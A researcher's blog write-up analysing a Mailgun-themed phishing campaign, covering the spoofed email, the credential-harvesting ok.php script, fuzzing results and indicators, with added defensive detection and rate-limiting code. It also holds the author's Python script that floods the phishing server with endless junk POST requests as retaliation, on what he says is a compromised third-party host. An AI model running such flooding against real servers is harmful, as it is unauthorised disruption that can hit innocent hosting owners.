
Introduction

Recently, the Mailgun security team published an article on their blog warning internet users about new scam emails and describing how legitimate-looking these messages have become, which makes it even harder for users to tell whether a message is genuine or fake.

While I was reading some of the received emails, I came across one of the most interesting and well-made phishing templates, one that could easily trap people who do not have enough knowledge to spot it. So in this research paper I will shine a light on a very tricky new Mailgun phishing campaign targeting thousands of internet users daily.

I am sure that many users have received an email saying "there is a receipt for your Mailgun subscription..." or "invoice is available to view," etc. Actually, I received that same email, and it was convincing enough to make me think the message was legitimate.


If we look at the link's text, it is actually the official web address of the Mailgun application. If we click on that link to see where it goes, it redirects the user to another eye-catching web address, and a normal user will not be able to detect that it is a scam. The malicious site uses the same design as the Mailgun application portal. Still, if we take a closer look at the spoofed link, it is obviously not related to the official Mailgun address.

At this point I had figured out that this was a phishing attempt, and that it was part of the same phishing campaign security researchers spotted in June 2020, but nobody had tried to trace the people behind it or to collect some footprints. That's why I decided to take down their operation and reveal the technical part of this attack.

To deliver a message: "Don't play with hackers... maybe we should film a documentary to deliver this message!"

Technical Analysis

Message Template

I will start by analyzing the message template, as it was a real trap for many internet users. Look at the message as shown in the following (figure 1.3):

(figure 1.3)

We can observe the difference between the link's text label and the address shown in Chrome's status bar. The scammers behind this operation deceive users by displaying the legitimate link as the label while the link itself redirects visitors to a different, malicious address.

Message Malicious Indicators

  • The sender address is spoofed and is not related to the Mailgun support team.
  • A malicious embedded link points to the address "app.mailgun.com.new-session.onswixx.254.bedstay41.com".
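Both indicators above can be checked automatically before a message reaches the user. The following is an added example, not code from the original post: it parses an HTML email, flags anchors whose visible text names one host while the href points at a different registrable domain, and flags hrefs whose hostname embeds a trusted brand domain as leading labels, exactly the "app.mailgun.com." prefix trick used here. TRUSTED_DOMAINS, the naive registrable-domain helper and the sample message are assumptions constructed for the example; the phishing hostname is the one listed in the post.

```python
"""Added example (not from the original post): flag phishing links whose visible
text names one host while the href points elsewhere, and hrefs whose hostname
embeds a trusted domain as leading labels (app.mailgun.com.<attacker-domain>).
TRUSTED_DOMAINS and the sample email below are assumptions / constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"mailgun.com"}          # brands this organisation wants protected (assumption)
URL_LIKE = re.compile(r"^(https?://)?(www\.)?[a-z0-9-]+(\.[a-z0-9-]+)+(/\S*)?$", re.I)
NON_WEB_SCHEME = re.compile(r"^(mailto|tel|sms|javascript|data|cid):", re.I)


class LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Naive registrable domain (last two labels); production code should use the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def host_of(url_or_text):
    """Hostname of a URL or bare domain; empty string for non-web schemes such as mailto:."""
    s = url_or_text.strip()
    if NON_WEB_SCHEME.match(s):
        return ""
    if "://" not in s:
        s = "http://" + s
    return (urlparse(s).hostname or "").lower()


def lookalike_of(host):
    """Return the trusted domain that `host` impersonates by embedding it, or None."""
    h = host.lower().rstrip(".")
    rd = registered_domain(h)
    for trusted in TRUSTED_DOMAINS:
        if rd != trusted and "." + trusted + "." in "." + h + ".":
            return trusted
    return None


def analyze_email_html(html):
    """Return a list of (finding, detail, host) tuples for suspicious links."""
    collector = LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        href_host = host_of(href)
        if not href_host:
            continue
        # 1. the visible text claims a URL whose registrable domain differs from the real target
        if URL_LIKE.match(text):
            text_host = host_of(text)
            if registered_domain(text_host) != registered_domain(href_host):
                findings.append(("text/href mismatch", text, href_host))
        # 2. the real target embeds a trusted brand domain as a decoy prefix
        trusted = lookalike_of(href_host)
        if trusted:
            findings.append(("lookalike host", href_host, trusted))
    return findings


PHISH_HOST = "app.mailgun.com.new-session.onswixx.254.bedstay41.com"   # hostname from the post's IoCs
# Constructed sample message modelled on the template described in the post.
SAMPLE_EMAIL_HTML = f"""
<p>Your Mailgun receipt is ready.</p>
<a href="http://{PHISH_HOST}/mailgun.com/">https://app.mailgun.com/app/billing</a>
<a href="http://{PHISH_HOST}/mailgun.com/">View invoice</a>
<a href="https://app.mailgun.com/login">https://app.mailgun.com</a>
<a href="mailto:support@example.com">support@example.com</a>
"""

if __name__ == "__main__":
    for finding in analyze_email_html(SAMPLE_EMAIL_HTML):
        print(finding)
```

The third anchor (text and href both under mailgun.com) produces nothing, so the check does not fire on the legitimate receipt it imitates; the two phishing anchors are caught by the lookalike rule even when their label is plain text like "View invoice".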

Application analysis

Basically, I wanted to analyze their application further to collect more information, as I wanted to hit back at them. I looked into the phishing page source to inspect it for interesting hidden information. According to (figure 1.4), we can see how they use a simple PHP script, "ok.php", to capture the entered credentials and store them in their database.

(figure 1.4)

With a little help from Burp Suite, we can take a closer look at what exactly happens when we submit some information, as shown below (figure 1.5).

(figure 1.5)

So, in summary, the script captures what you typed in the username and password fields and then reads the other values (c1, c2, c3) from the URL, as detailed in (figure 1.6).


(figure 1.6)

These parameter values help the scammers know who clicked on or visited the malicious link and organize their work logic.

Fuzzing

Like any enumeration process, fuzzing files and directories helps to discover hidden information or sensitive files. Besides, it can help to visualize and understand how this application works and its internal design structure.

So I started fuzzing with a big wordlist for content discovery (SecLists' "big.txt") and, as usual, I found some exposed application files, as shown in the following (figure 1.7).

(figure 1.7)

What I understood from this phishing script's structure is that it stores the information of victims who clicked on any malicious link from their mailbox and then assigns a unique hash key per infected person by storing it in a file named "emailClicker.txt". This tactic helps the scammers target the victim again with a different phishing campaign. That's the reason why, if you got phished once, you might receive a lot of emails in the future.

Application logic attack

If we go back to the POST request handled by the PHP script "ok.php", I noticed that no CSRF token is assigned to each request, which means nothing stops us from sending multiple requests to the server to check whether the application is vulnerable to a "missing rate limitation" attack.

If you are not familiar with "Missing Rate Limitation", you can check the following published HackerOne report (Link). After testing the attack, I found out that, luckily, this application is vulnerable: there is no timeout limitation after sending 100 requests.

You may ask yourself what the benefit of this type of attack is. My answer: filling their DB with 10000 random records or more could lead to interruption of the service or corruption due to an unhandled amount of data rendering.
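From the defending side, "missing rate limitation" is simply a form handler that accepts an unbounded number of submissions from one client. The following added example, which is not code from the post or from the phishing kit, replays the scenario described above (100 POSTs from one address in a few seconds) against two hypothetical login handlers: one that stores every submission, and one guarded by a per-client sliding-window limiter. A fake clock keeps the run deterministic; all function and variable names are assumptions.

```python
"""Added example (not from the original post): a form handler with and without
per-client rate limiting, driven by a fake clock so the behaviour the post
describes (100 POSTs with no throttling) is reproduced deterministically.
All names here are hypothetical."""
import time
from collections import defaultdict, deque


class SlidingWindowLimiter:
    """Allow at most `limit` requests per `window` seconds for each client key."""

    def __init__(self, limit, window, clock=time.monotonic):
        self.limit = limit
        self.window = window
        self.clock = clock
        self._hits = defaultdict(deque)   # key -> timestamps of recent requests

    def allow(self, key):
        now = self.clock()
        q = self._hits[key]
        while q and now - q[0] >= self.window:   # drop hits that fell out of the window
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def login_unprotected(store, client_ip, form):
    """Behaves like the post's target: every POST is stored, nothing throttles the caller."""
    store.append((client_ip, form["username"]))
    return 200


def login_protected(limiter, store, client_ip, form):
    """Same handler, but the client is checked against the limiter first."""
    if not limiter.allow(client_ip):
        return 429                       # Too Many Requests; nothing is stored
    store.append((client_ip, form["username"]))
    return 200


def simulate(requests_count=100, limit=5, window=60):
    """Replay `requests_count` POSTs from one IP against both handlers.
    Returns (rows stored unprotected, rows stored protected, 429 count, allowed again after window)."""
    fake_now = [1000.0]
    limiter = SlidingWindowLimiter(limit, window, clock=lambda: fake_now[0])
    form = {"username": "victim@example.com", "password": "hunter2"}   # constructed
    open_store, guarded_store = [], []
    rejected = 0
    for _ in range(requests_count):
        fake_now[0] += 0.1                                  # ten requests per second
        login_unprotected(open_store, "203.0.113.5", form)
        if login_protected(limiter, guarded_store, "203.0.113.5", form) == 429:
            rejected += 1
    stored_protected = len(guarded_store)
    fake_now[0] += window                                   # wait out the window
    allowed_again = login_protected(limiter, guarded_store, "203.0.113.5", form) == 200
    return len(open_store), stored_protected, rejected, allowed_again


if __name__ == "__main__":
    print(simulate())   # (100, 5, 95, True)
```

With a limit of 5 per 60 seconds, the unprotected handler stores all 100 rows while the guarded one stores 5 and rejects 95 with 429, then accepts the client again once the window has passed. Keying the limiter on the client address is the minimum; real deployments also key on the account being targeted so that a distributed source cannot sidestep the per-IP budget.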

To speed up the process, I coded a simple Python script to automate the infinite loop (figure 1.8):

#!/usr/bin/env python

import requests

headers = {'User-Agent': 'Mozilla/5.0'}
# the c3 value is cut off in the original screenshot
payload = {'username': '0xsp@0xsp.com', 'password': '12312345615',
           'c1': '2ebd2d3b5f6744d429de59ec57b26c01',
           'c2': '36c80420beacf8cc9531991a82ea44de',
           'c3': 'eaa2458fc49d7d44bb91d89d955778'}
link = 'http://app.mailgun.com.new-session.onswixx.254.bedstay41.com/mailgun.com/com/ok.php'

i = 0
while True:
    try:
        print("Sending requests - exploiting Missing Rate Limitation")
        session = requests.Session()
        # GET first so the server hands out its session cookie, then POST the form with it
        resp = session.get(link, headers=headers)
        cookies = requests.utils.cookiejar_from_dict(requests.utils.dict_from_cookiejar(session.cookies))
        resp = session.post(link, headers=headers, data=payload, cookies=cookies)
        session.get(link)
        i += 1
    except requests.exceptions.RequestException as e:
        print(e)


The attack sent more than 10000 requests, and I am sure their DB is a total mess now. That was not enough for me, so I did some enumeration of their DNS records and found out that they were hosting their application on a compromised server hosted by Leaseweb. That's great!

After that, I decided to report it to the hosting provider, so I contacted Leaseweb's phishing prevention team with a detailed description. Obviously, they disabled the malicious script and removed the host.


IOC

  • app.mailgun.com.new-session.onswixx.xx ..
  • ok.php
  • new.php
  • ipClicker.txt
  • emailClicker.txt
  • detect.php
  • /mailgun.com/
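The indicators above are most useful when run over the organisation's own web-proxy logs to find who clicked and, more importantly, who went on to submit the form to ok.php. The following is an added example, not part of the original post: it matches the IoC hostname pattern and the kit's "/mailgun.com/" directory against constructed proxy log lines and ranks each internal client by the worst thing seen. The log format, the client addresses and the lines themselves are constructed; the hostname prefix and the paths come from the post's IoC list.

```python
"""Added example (not from the original post): match the post's IoCs against
web-proxy log lines to find which internal clients clicked the phishing link and
which went on to submit the form to ok.php. The log format and the lines below
are constructed; the host pattern and paths come from the post's IoC list."""
import re
from urllib.parse import urlparse

IOC_HOST = re.compile(r"^app\.mailgun\.com\.new-session\.onswixx\.", re.I)
IOC_PATH_PREFIX = "/mailgun.com/"          # directory the kit was served from
CREDENTIAL_SINK = "/ok.php"                # script that receives the POSTed form
SEVERITY = {"credentials-submitted": 3, "clicked": 2, "suspicious-path": 1}

# Constructed log format: "<timestamp> <client_ip> <method> <url> <status>"
LOG_LINE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+) (\d{3})$")

SAMPLE_PROXY_LOG = [   # constructed sample lines
    "2020-09-01T10:15:02Z 10.0.0.21 GET http://app.mailgun.com.new-session.onswixx.254.bedstay41.com/mailgun.com/ 200",
    "2020-09-01T10:15:40Z 10.0.0.21 POST http://app.mailgun.com.new-session.onswixx.254.bedstay41.com/mailgun.com/com/ok.php 302",
    "2020-09-01T10:16:05Z 10.0.0.37 GET https://app.mailgun.com/app/billing 200",
    "2020-09-01T10:17:11Z 10.0.0.37 GET http://app.mailgun.com.new-session.onswixx.254.bedstay41.com/mailgun.com/ 200",
    "2020-09-01T10:18:30Z 10.0.0.42 GET http://cdn.example.net/mailgun.com/logo.png 200",
    "garbage line that does not parse",
]


def registered_domain(host):
    """Naive registrable domain (last two labels); use the Public Suffix List in production."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify(method, url):
    """Verdict for one request, or None if it matches no indicator."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    path = parsed.path
    if IOC_HOST.match(host):
        if method == "POST" and path.endswith(CREDENTIAL_SINK):
            return "credentials-submitted"
        return "clicked"
    # The kit's directory name on a host that is not really mailgun.com is a weaker signal
    if IOC_PATH_PREFIX in path and registered_domain(host) != "mailgun.com":
        return "suspicious-path"
    return None


def scan_proxy_log(lines):
    """Return (client_ip, verdict, url) for every matching request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue                      # unparseable lines are skipped, not fatal
        _ts, client_ip, method, url, _status = m.groups()
        verdict = classify(method, url)
        if verdict:
            hits.append((client_ip, verdict, url))
    return hits


def triage(lines):
    """Worst verdict per client, so responders know whose password to reset first."""
    worst = {}
    for client_ip, verdict, _url in scan_proxy_log(lines):
        if SEVERITY[verdict] > SEVERITY.get(worst.get(client_ip), 0):
            worst[client_ip] = verdict
    return worst


if __name__ == "__main__":
    for ip, verdict in sorted(triage(SAMPLE_PROXY_LOG).items()):
        print(ip, verdict)
```

The POST to ok.php is the line that matters: a GET on the kit's host only proves a click, whereas the POST is the point at which the script described above writes the typed credentials to the attacker's database, so that client's account should be reset first.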

Lawrence Amer
Offensive security expert and founder of 0xsp Security Research and Development (SRD), passionate about hacking and breaking stuff, coder and maintainer of 0xsp-mongoose RED and many other open-source projects.